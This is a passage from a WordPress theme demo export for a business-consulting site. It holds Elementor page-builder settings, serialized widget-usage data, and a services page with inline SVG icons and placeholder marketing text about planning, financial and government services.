Development","header_size":"h3","_padding":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false},"title_typography_typography":"custom","title_typography_font_size_mobile":{"unit":"px","size":30,"sizes":[]},"stitle_bg":"#4B83FC1A","is_highlight":"","stitle_typography_typography":"custom","stitle_typography_font_size":{"unit":"px","size":14,"sizes":[]}},"elements":[],"widgetType":"iheading"},{"id":"ce3460e","elType":"widget","settings":{"ot_tabs":[{"tab_title":"Research","tab_content":"<p>We are working in the format of an outsourcing project office. We assume operational coordination and control over the compliance with all project implementation parameters that ensures the execution of works on time.<\/p><p>Integrated career development, business consulting and digital media solutions connect your vision to results. Instead of quick-fix, out of the box, buy-in-bulk products, I develop highly customized solutions.<\/p>","_id":"ee4235d"},{"tab_title":"aproach","tab_content":"<p>We can definitely define the provided level and range of Synergy Development Consulting as a full-cycle support. Therefore, we treat each client as an equal partner in the long term. Our team consists of talented and motivated people who are united by love to their work!<\/p><p>Integrated career development, business consulting and digital media solutions connect your vision to results. Instead of quick-fix, out of the box, buy-in-bulk products, I develop highly customized solutions.<\/p>","_id":"768bb7a"},{"tab_title":"result","tab_content":"<p>Successful experience of experts in structuring investment projects, developing and implementing construction, developers and energy projects, restructuring programs, etc. provides a positive impact on your company profitability.<\/p><p>Integrated career development, business consulting and digital media solutions connect your vision to results. Instead of quick-fix, out of the box, buy-in-bulk products, I develop highly customized solutions.<\/p>","_id":"3a5c920"}],"title_space":{"unit":"px","size":0,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"40","bottom":"40","left":"0","isLinked":false},"title_width_mobile":{"unit":"%","size":100,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"itabs"},{"id":"6e6c83a","elType":"widget","settings":{"btn_style":"dark","text":"Explore More "},"elements":[],"widgetType":"ibutton"}],"isInner":false},{"id":"70eb409","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"db0c981","elType":"section","settings":{"layout":"full_width","background_background":"classic","background_color":"#F5F5F5","border_radius":{"unit":"px","top":"10","right":"10","bottom":"10","left":"10","isLinked":true},"padding":{"unit":"px","top":"50","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[{"id":"7540ef2","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"d0b9d6d","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/chart1-service-home3.png","id":1701},"image_size":"full"},"elements":[],"widgetType":"image"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:10:{s:7:"heading";a:3:{s:5:"count";i:3;s:15:"control_percent";i:3;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_title";a:2:{s:5:"title";i:3;s:11:"header_size";i:2;}}s:5:"style";a:1:{s:19:"section_title_style";a:7:{s:11:"title_color";i:3;s:21:"typography_typography";i:3;s:22:"typography_font_family";i:1;s:20:"typography_font_size";i:2;s:22:"typography_font_weight";i:3;s:25:"typography_text_transform";i:1;s:27:"typography_font_size_mobile";i:2;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:8:"_padding";i:3;s:15:"_padding_mobile";i:1;}}}}s:7:"ibutton";a:3:{s:5:"count";i:3;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:14:"button_section";a:5:{s:9:"btn_style";i:2;s:4:"text";i:3;s:5:"align";i:1;s:12:"align_mobile";i:1;s:4:"link";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}s:6:"column";a:3:{s:5:"count";i:15;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:6:"layout";a:1:{s:6:"layout";a:3:{s:12:"_inline_size";i:15;s:19:"_inline_size_tablet";i:10;s:19:"_inline_size_mobile";i:2;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:2:{s:13:"margin_tablet";i:3;s:13:"margin_mobile";i:2;}}}}s:7:"section";a:3:{s:5:"count";i:8;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:6:"layout";a:2:{s:14:"section_layout";a:3:{s:6:"layout";i:3;s:3:"gap";i:5;s:16:"content_position";i:3;}s:17:"section_structure";a:1:{s:9:"structure";i:5;}}s:5:"style";a:2:{s:18:"section_background";a:8:{s:21:"background_background";i:4;s:16:"background_image";i:3;s:19:"background_position";i:3;s:26:"background_position_mobile";i:1;s:17:"background_repeat";i:3;s:15:"background_size";i:3;s:22:"background_size_tablet";i:1;s:16:"background_color";i:1;}s:14:"section_border";a:1:{s:13:"border_radius";i:2;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:3:{s:7:"padding";i:7;s:14:"padding_tablet";i:2;s:14:"padding_mobile";i:5;}}}}s:8:"iheading";a:3:{s:5:"count";i:3;s:15:"control_percent";i:4;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:4:{s:3:"sub";i:3;s:5:"title";i:3;s:11:"header_size";i:3;s:5:"align";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:8:"_padding";i:3;s:15:"_padding_mobile";i:1;}}s:5:"style";a:1:{s:13:"style_section";a:7:{s:9:"stitle_bg";i:3;s:27:"title_typography_typography";i:3;s:33:"title_typography_font_size_mobile";i:3;s:12:"is_highlight";i:3;s:28:"stitle_typography_typography";i:3;s:27:"stitle_typography_font_size";i:3;s:11:"title_color";i:1;}}}}s:11:"iaccordions";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:15:"content_section";a:1:{s:7:"ot_accs";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:8:"_padding";i:1;s:15:"_padding_tablet";i:1;}}}}s:5:"image";a:3:{s:5:"count";i:2;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:13:"section_image";a:3:{s:5:"image";i:2;s:10:"image_size";i:2;s:5:"align";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:7:"_margin";i:1;s:14:"_margin_tablet";i:1;}}}}s:9:"iiconbox1";a:3:{s:5:"count";i:4;s:15:"control_percent";i:8;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:5:{s:5:"align";i:4;s:9:"icon_font";i:4;s:5:"title";i:4;s:3:"des";i:4;s:8:"btn_text";i:4;}}s:5:"style";a:3:{s:17:"style_box_section";a:8:{s:7:"is_line";i:4;s:11:"box_padding";i:4;s:16:"bg_hover_icon_bg";i:4;s:18:"bg_hover_des_color";i:4;s:6:"bg_box";i:4;s:12:"bg_hover_box";i:4;s:19:"bg_hover_icon_color";i:4;s:23:"bg_hover_link_btn_color";i:4;}s:18:"style_icon_section";a:5:{s:9:"is_border";i:4;s:10:"icon_space";i:4;s:9:"icon_size";i:4;s:13:"icon_bg_width";i:4;s:7:"icon_bg";i:4;}s:21:"style_content_section";a:7:{s:27:"title_typography_typography";i:4;s:26:"title_typography_font_size";i:4;s:28:"title_typography_font_weight";i:1;s:9:"des_color";i:4;s:25:"des_typography_typography";i:4;s:26:"des_typography_font_family";i:4;s:24:"des_typography_font_size";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:15:"_padding_tablet";i:2;s:15:"_padding_mobile";i:1;}}}}s:11:"text-editor";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:7:"content";a:1:{s:14:"section_editor";a:1:{s:6:"editor";i:1;}}s:5:"style";a:1:{s:13:"section_style";a:1:{s:10:"text_color";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:15:"_padding_mobile";i:1;}}}}s:5:"itabs";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:1:{s:7:"ot_tabs";i:1;}}s:5:"style";a:1:{s:11:"style_title";a:2:{s:11:"title_space";i:1;s:18:"title_width_mobile";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:8:"_padding";i:1;s:15:"_padding_mobile";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_bg_image]]></wp:meta_key>
		<wp:meta_value><![CDATA[2033]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Business Consulting</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/our-services/business-consulting/</link>
		<pubDate>Thu, 17 Sep 2020 08:25:54 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?page_id=977</guid>
		<description></description>
		<content:encoded><![CDATA[<h5>Services</h5>
<ul>
 	<li>
					<a href="http://wpdemo.archiwp.com/maxbizz/marketing-research">
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve"></svg>
<g>
<g id="c147_full_moon">
<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
</g>
<g id="Capa_1_14_">
</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>

marketing research
</a></li>
 	<li>
					<a href="http://wpdemo.archiwp.com/maxbizz/our-services/organizational-audit/">
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve"></svg>
<g>
<g id="c147_full_moon">
<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
</g>
<g id="Capa_1_14_">
</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>

Organizational Audit
</a></li>
 	<li>
					<a href="http://wpdemo.archiwp.com/maxbizz/business-consulting">
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve"></svg>
<g>
<g id="c147_full_moon">
<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
</g>
<g id="Capa_1_14_">
</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>

business consulting
</a></li>
 	<li>
					<a href="http://wpdemo.archiwp.com/maxbizz/our-services/project-management/">
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve"></svg>
<g>
<g id="c147_full_moon">
<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
</g>
<g id="Capa_1_14_">
</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>

project management
</a></li>
 	<li>
					<a href="http://wpdemo.archiwp.com/maxbizz/our-services/support-function/">
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve"></svg>
<g>
<g id="c147_full_moon">
<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
</g>
<g id="Capa_1_14_">
</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>

support functions
</a></li>
 	<li>
					<a href="http://wpdemo.archiwp.com/maxbizz/our-services/finance-planning/">
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve"></svg>
<g>
<g id="c147_full_moon">
<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
</g>
<g id="Capa_1_14_">
</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>

finance planning
</a></li>
</ul>
<h5>Brochures</h5>
<a href="#">
<img width="270" height="90" src="https://maxbizz.s3.amazonaws.com/images/img-btn-pdf-home3.jpg" alt="" loading="lazy">								</a>
<h3>Strategic &amp; Tactical Planning</h3>
It’s a daunting challenge: How do you move forward at speed despite enormous uncertainty? Radar Strategy provides the answer. Our unique "Today Forward, Future Back" approach enables you to create value now as you move toward your future vision, with the flexibility to adapt as scenarios change. We’ll help you make critical choices and choreograph your transformation journey as you bring your core to full potential and build new growth engines.

Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks: an outside-in approach that puts customers first, a uniquely great customer experience and internal capabilities that ensure you deliver optimal customer interactions at every touchpoint.

<svg xmlns="http://www.w3.org/2000/svg" id="Capa_1" viewBox="0 0 512 512"><g><path d="m257.756 273.413c75.381 0 136.707-61.326 136.707-136.707 0-75.38-61.326-136.706-136.707-136.706s-136.707 61.326-136.707 136.706c0 75.381 61.327 136.707 136.707 136.707zm0-258.384c67.093 0 121.677 54.584 121.677 121.677s-54.584 121.678-121.677 121.678-121.678-54.584-121.678-121.678c0-67.092 54.585-121.677 121.678-121.677z"></path><path d="m257.755 235.574c54.516 0 98.868-44.352 98.868-98.867s-44.352-98.867-98.868-98.867c-24.609 0-48.193 9.099-66.407 25.621-3.074 2.789-3.305 7.541-.517 10.615 2.789 3.074 7.542 3.307 10.615.517 15.443-14.009 35.441-21.724 56.309-21.724 46.229 0 83.839 37.61 83.839 83.838s-37.61 83.838-83.839 83.838c-46.228 0-83.837-37.609-83.837-83.838 0-13.96 3.497-27.777 10.114-39.957 1.981-3.647.631-8.209-3.016-10.19-3.646-1.982-8.208-.63-10.19 3.016-7.809 14.375-11.937 30.673-11.937 47.131 0 54.515 44.351 98.867 98.866 98.867z"></path><path d="m254.898 172.111c-11.802-.719-15.044-7.822-15.645-9.491-.86-3.212-3.782-5.58-7.265-5.58-4.158 0-7.529 3.371-7.529 7.53 0 .604.079 1.188.213 1.751l-.003.001c.007.027.021.079.04.144.092.355.201.703.342 1.036 1.39 3.834 6.959 15.729 23.371 18.907v9.999c0 4.15 3.365 7.515 7.515 7.515 4.151 0 7.515-3.364 7.515-7.515v-9.773c7.193-1.252 12.025-4.396 15.046-7.239 5.621-5.29 8.977-13.286 8.977-21.39 0-7.615-2.986-25.655-30.649-28.707-5.48-.605-9.389-2.349-11.62-5.183-1.969-2.503-2.182-5.268-2.182-6.341 0-1.322.363-12.913 12.913-12.913 8.234 0 11.559 5.237 12.184 6.376 1.114 2.766 3.818 4.72 6.982 4.72 4.158 0 7.529-3.371 7.529-7.529 0-1.236-.304-2.4-.832-3.429l.004-.002c-2.118-4.604-8.099-11.807-18.353-14.287v-10.087c0-4.15-3.364-7.515-7.515-7.515-4.15 0-7.515 3.365-7.515 7.515v10.055c-14.832 3.522-20.428 17.361-20.428 27.095 0 10.823 7.119 24.248 27.183 26.462 17.268 1.906 17.268 10.835 17.268 13.769 0 3.117-1.115 7.498-4.247 10.445-2.961 2.787-7.433 4.019-13.299 3.661z"></path><path d="m130.238 347.994c-1.42-1.51-3.401-2.366-5.474-2.366s-4.053.856-5.474 2.366l-51.047 54.268c-2.054 2.184-2.613 5.379-1.424 8.13 1.189 2.752 3.9 4.533 6.898 4.533h14.754v27.289c0 4.15 3.365 7.515 7.515 7.515s7.515-3.365 7.515-7.515v-34.804c0-4.15-3.365-7.515-7.515-7.515h-4.884l33.661-35.786 33.661 35.786h-4.884c-4.15 0-7.515 3.365-7.515 7.515v89.56h-42.526v-24.697c0-4.15-3.365-7.515-7.515-7.515s-7.515 3.365-7.515 7.515v32.212c0 4.15 3.365 7.515 7.515 7.515h57.555c4.15 0 7.515-3.365 7.515-7.515v-89.56h14.754c2.997 0 5.708-1.781 6.898-4.533 1.189-2.751.63-5.947-1.424-8.13z"></path><path d="m263.229 296.294c-1.42-1.51-3.401-2.366-5.474-2.366s-4.053.856-5.474 2.366l-51.046 54.269c-2.054 2.184-2.614 5.379-1.424 8.13 1.189 2.752 3.9 4.533 6.898 4.533h14.754v141.259c0 4.15 3.365 7.515 7.515 7.515h57.555c4.151 0 7.515-3.365 7.515-7.515v-141.259h14.754c2.998 0 5.708-1.781 6.898-4.533 1.189-2.751.629-5.947-1.425-8.13zm23.304 51.903c-4.151 0-7.515 3.365-7.515 7.515v141.259h-42.526v-141.26c0-4.15-3.365-7.515-7.515-7.515h-4.884l33.661-35.786 33.661 35.786h-4.882z"></path><path d="m396.221 248.46c-1.42-1.51-3.401-2.366-5.474-2.366-2.072 0-4.054.856-5.474 2.366l-51.047 54.268c-2.054 2.183-2.614 5.379-1.425 8.13 1.19 2.752 3.9 4.533 6.898 4.533h14.754v45.859c0 4.15 3.364 7.515 7.515 7.515s7.515-3.365 7.515-7.515v-53.373c0-4.15-3.364-7.515-7.515-7.515h-4.883l33.661-35.786 33.66 35.786h-4.883c-4.151 0-7.515 3.365-7.515 7.515v189.094h-42.526v-105.662c0-4.15-3.364-7.515-7.515-7.515s-7.515 3.364-7.515 7.515v113.177c0 4.15 3.364 7.515 7.515 7.515h57.556c4.151 0 7.515-3.365 7.515-7.515v-189.095h14.754c2.998 0 5.708-1.781 6.898-4.533 1.189-2.751.629-5.947-1.425-8.13z"></path><path d="m92.805 139.396c0-4.15-3.365-7.515-7.515-7.515h-44.075c-4.15 0-7.515 3.365-7.515 7.515s3.364 7.515 7.515 7.515h44.075c4.151-.001 7.515-3.365 7.515-7.515z"></path><path d="m95.012 198.37-15.676 6.141c-3.865 1.514-5.77 5.874-4.256 9.738 1.161 2.964 3.997 4.775 6.999 4.775.912 0 1.839-.167 2.739-.52l15.676-6.141c3.865-1.514 5.77-5.874 4.256-9.738-1.515-3.863-5.875-5.769-9.738-4.255z"></path><path d="m79.336 74.279 15.676 6.141c.901.353 1.827.52 2.739.52 3.002 0 5.838-1.812 6.999-4.775 1.514-3.864-.391-8.224-4.256-9.738l-15.676-6.141c-3.866-1.514-8.224.392-9.738 4.256-1.514 3.863.392 8.223 4.256 9.737z"></path><path d="m470.785 131.881h-44.075c-4.151 0-7.515 3.365-7.515 7.515s3.364 7.515 7.515 7.515h44.075c4.151 0 7.515-3.365 7.515-7.515-.001-4.15-3.365-7.515-7.515-7.515z"></path><path d="m411.506 212.365 15.675 6.141c.901.353 1.828.52 2.74.52 3.002 0 5.838-1.812 6.999-4.775 1.514-3.864-.391-8.224-4.255-9.738l-15.675-6.141c-3.868-1.514-8.224.392-9.739 4.256-1.514 3.862.391 8.222 4.255 9.737z"></path><path d="m414.25 80.94c.912 0 1.84-.167 2.74-.52l15.675-6.141c3.864-1.514 5.769-5.874 4.255-9.738-1.515-3.865-5.876-5.768-9.739-4.256l-15.675 6.141c-3.864 1.514-5.769 5.874-4.255 9.738 1.161 2.965 3.997 4.776 6.999 4.776z"></path></g></svg>
<h5><a href="#">Financial Services</a></h5>
We help financial institutions, from banking and insurance to wealth.

<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 511.999 511.999" style="enable-background:new 0 0 511.999 511.999;" xml:space="preserve"></svg>
<g>
<g>
		<path d="M505.709,159.575L336.462,50.682c-3.379-2.174-7.879-1.196-10.052,2.181c-2.173,3.378-1.197,7.878,2.181,10.052    l166.773,107.301h-38.878L266.64,48.07c-6.463-4.158-14.816-4.157-21.28,0L55.514,170.216H16.636L255.991,16.204l33.899,21.81    c3.379,2.173,7.878,1.197,10.052-2.181c2.173-3.378,1.197-7.878-2.181-10.052l-33.899-21.81c-4.776-3.073-10.947-3.073-15.723,0    L6.291,159.575c-5.15,3.314-7.45,9.488-5.723,15.364c1.727,5.876,7.002,9.824,13.126,9.824h36.684v25.07v21.956    c0,5.789,4.106,10.637,9.558,11.784v12.801c0,6.64,5.402,12.042,12.042,12.042h1v89.112c0,4.017,3.256,7.273,7.273,7.273    c4.017,0,7.273-3.256,7.273-7.273v-96.385c0-4.017-3.256-7.273-7.273-7.273h-5.768v-10.04h51.513v10.038h-5.768    c-4.017,0-7.273,3.256-7.273,7.273v160.696c0,4.017,3.256,7.273,7.273,7.273h5.768v10.915H74.483V429.11h5.768    c4.017,0,7.273-3.256,7.273-7.273v-18.59c0-4.017-3.256-7.273-7.273-7.273c-4.017,0-7.273,3.256-7.273,7.273v11.317h-1    c-6.64,0-12.042,5.401-12.042,12.041v12.801c-5.453,1.147-9.558,5.995-9.558,11.784v14.682H24.614    c-8.04,0-14.581,6.541-14.581,14.581v15.299c0,8.04,6.541,14.581,14.581,14.581h462.772c8.04,0,14.581-6.541,14.581-14.581    v-15.299c0-8.04-6.541-14.581-14.581-14.581h-25.764V451.19c0-5.789-4.106-10.637-9.558-11.784v-12.801    c0-6.64-5.402-12.041-12.042-12.041h-1v-146.15h1c6.64,0,12.042-5.402,12.042-12.042v-12.801    c5.453-1.147,9.558-5.995,9.558-11.784v-21.956v-25.07h36.684c6.124,0,11.399-3.948,13.126-9.824    C513.159,169.063,510.859,162.888,505.709,159.575z M253.23,60.303c1.683-1.083,3.857-1.082,5.54,0l170.833,109.914H82.398    L253.23,60.303z M64.924,184.762h382.151v17.797h-77.902h-70.585h-85.176h-70.585H64.924V184.762z M296.304,439.408v-12.801    c0-6.64-5.402-12.041-12.042-12.041h-1v-146.15h1c6.64,0,12.042-5.402,12.042-12.042v-12.801    c5.453-1.147,9.558-5.995,9.558-11.784v-14.683H361.9v14.683c0,5.789,4.106,10.637,9.558,11.784v12.801    c0,6.64,5.402,12.042,12.042,12.042h1v146.15h-1c-6.64,0-12.042,5.401-12.042,12.041v12.801    c-5.452,1.147-9.558,5.995-9.558,11.784v14.682h-56.038v-14.682C305.862,445.403,301.756,440.555,296.304,439.408z     M140.542,439.408v-12.801c0-6.64-5.402-12.041-12.042-12.041h-1v-146.15h1c6.64,0,12.042-5.402,12.042-12.042v-12.801    c5.452-1.147,9.558-5.995,9.558-11.784v-14.683h56.039v14.683c0,5.789,4.106,10.637,9.558,11.784v12.801    c0,6.64,5.402,12.042,12.042,12.042h1v146.15h-1c-6.64,0-12.042,5.401-12.042,12.041v12.801    c-5.452,1.147-9.558,5.995-9.558,11.784v14.682H150.1v-14.682C150.1,445.403,145.994,440.555,140.542,439.408z M275.989,429.11    h5.768v10.915h-51.513V429.11h5.768c4.017,0,7.273-3.256,7.273-7.273V261.142c0-4.017-3.256-7.274-7.273-7.274h-5.768V243.83    h51.513v10.038h-5.768c-4.017,0-7.273,3.256-7.273,7.273v160.696C268.716,425.854,271.972,429.11,275.989,429.11z M222.97,229.284    h-0.032h-2.253v-12.178h70.63v12.178h-2.285c-0.005,0-0.011,0.001-0.016,0.001s-0.011-0.001-0.016-0.001H222.97z M220.685,454.213    c0.71,0.231,1.466,0.36,2.253,0.36h66.059c0.811,0,1.589-0.139,2.318-0.384v11.684h-70.63V454.213z M67.21,229.284h-2.285v-12.178    h70.63v12.178h-0.001h-2.285H67.21z M64.924,454.201c0.719,0.238,1.486,0.372,2.285,0.372h66.06c0.799,0,1.566-0.134,2.285-0.372    v11.672h-70.63V454.201z M487.421,480.454l-0.02,15.333c0,0-0.004,0.001-0.015,0.001l-462.807-0.034l0.035-15.334L487.421,480.454    z M444.77,454.572c0.807,0,1.58-0.137,2.306-0.379v11.68h-70.63v-11.665c0.713,0.234,1.473,0.364,2.265,0.364H444.77z     M391.772,253.869h-5.768V243.83h51.513v10.038h-5.768c-4.017,0-7.273,3.256-7.273,7.273v160.696c0,4.017,3.256,7.274,7.273,7.274    h5.768v10.915h-51.513v-10.915h5.768c4.017,0,7.273-3.256,7.273-7.273V261.142C399.045,257.125,395.789,253.869,391.772,253.869z     M447.077,229.284L447.077,229.284h-2.286c-0.003,0-0.007,0.001-0.01,0.001s-0.007-0.001-0.01-0.001h-66.039h-0.02h-2.265v-12.178    h70.63V229.284z"></path>
	</g>
</g>
<g>
<g>
		<path d="M259.076,113.165V90.459c7.83,0.559,10.738,4.138,13.422,4.138c3.356,0,4.922-4.25,4.922-6.375    c0-5.48-10.738-7.829-18.344-8.053v-3.02c0-1.343-1.677-2.573-3.355-2.573c-1.902,0-3.244,1.231-3.244,2.573v3.244    c-10.626,1.118-21.252,6.711-21.252,20.804c0,14.317,11.186,18.344,21.252,21.923v26.283c-11.409-0.894-14.429-8.724-18.12-8.724    c-2.796,0-5.145,3.691-5.145,6.376c0,5.481,9.395,12.975,23.265,13.199h0v3.468c0,1.343,1.342,2.573,3.244,2.573    c1.677,0,3.355-1.231,3.355-2.573v-3.803c12.08-1.677,20.357-9.283,20.357-23.041    C279.433,121.666,268.807,116.744,259.076,113.165z M253.149,111.04c-5.929-2.237-10.738-4.586-10.738-10.962    c0-5.816,4.474-8.612,10.738-9.395V111.04z M258.406,149.181V125.58c5.48,2.349,9.842,5.481,9.843,12.528    C268.249,144.483,264.446,148.063,258.406,149.181z"></path>
	</g>
</g>
<h5><a href="#">Government Services</a></h5>
We help financial institutions, from banking and insurance to wealth.

<svg xmlns="http://www.w3.org/2000/svg" id="Capa_1" viewBox="0 0 512 512"><g><path d="m456.907 161.731-36.977-14.932c-5.967-2.408-12.25-3.628-18.678-3.628-.03 0-.06 0-.09 0l-24.136.04-20.518-19.911c5.611-3.677 9.33-10.01 9.33-17.204 0-11.34-9.227-20.567-20.567-20.567h-26.483c-.377 0-.745.037-1.107.091l-83.802-81.325c-2.83-2.748-6.562-4.263-10.51-4.267l-42.989-.028c-.002 0-.004 0-.005 0-3.635 0-7.013 1.96-8.815 5.118-1.804 3.158-1.774 7.065.075 10.194l75.651 128.099-41.77.065c-1.196.001-2.404.092-3.59.27-.059.009-.118.018-.177.029l-70.077 12.26-49.75-37.177c-2.049-1.533-4.583-2.376-7.139-2.376-.008 0-.016 0-.023 0l-24.191.042c-3.835.008-7.347 2.111-9.164 5.488s-1.637 7.465.468 10.667l34.021 51.798-33.842 51.918c-2.094 3.213-2.258 7.302-.427 10.673 1.827 3.363 5.337 5.45 9.161 5.45h.021l24.19-.042c2.566-.005 5.106-.857 7.149-2.397l49.624-37.352 70.119 12.016c.061.011.123.02.185.029 1.18.171 2.397.244 3.577.257l41.861-.065-37.682 63.807c-6.849-3.421-10.843-6.886-12.607-8.651-1.956-1.955-3.795-4.086-5.467-6.335-3.195-4.301-8.101-6.773-13.46-6.787-.015 0-.028 0-.042 0-5.355 0-10.271 2.457-13.49 6.745-1.672 2.226-3.536 4.371-5.544 6.377-6.604 6.605-22.881 17.722-57.691 17.975l-11.326.082c-6.876.05-12.471 5.685-12.471 12.562v40.948c0 4.109 3.33 7.439 7.439 7.439s7.439-3.33 7.439-7.439v-38.647l9.027-.066c40.116-.292 59.888-14.117 68.103-22.331 2.501-2.501 4.829-5.181 6.922-7.967.521-.694 1.22-.8 1.593-.8h.005c.445.002 1.075.139 1.556.786 2.104 2.828 4.421 5.513 6.886 7.979 6.615 6.614 26.491 22.031 68.105 22.333l9.027.066v73.838c0 14.933-3.471 29.913-10.038 43.322s-16.273 25.336-28.07 34.493l-37.26 28.918c-2.961 2.297-6.503 3.511-10.245 3.511s-7.284-1.214-10.243-3.51l-37.261-28.919c-11.796-9.156-21.503-21.083-28.07-34.493-6.566-13.409-10.038-28.389-10.038-43.322 0-4.109-3.33-7.439-7.439-7.439s-7.439 3.33-7.439 7.439c0 17.188 3.995 34.432 11.554 49.866 7.559 15.435 18.731 29.163 32.308 39.702l37.262 28.919c5.513 4.278 12.39 6.635 19.364 6.635s13.852-2.357 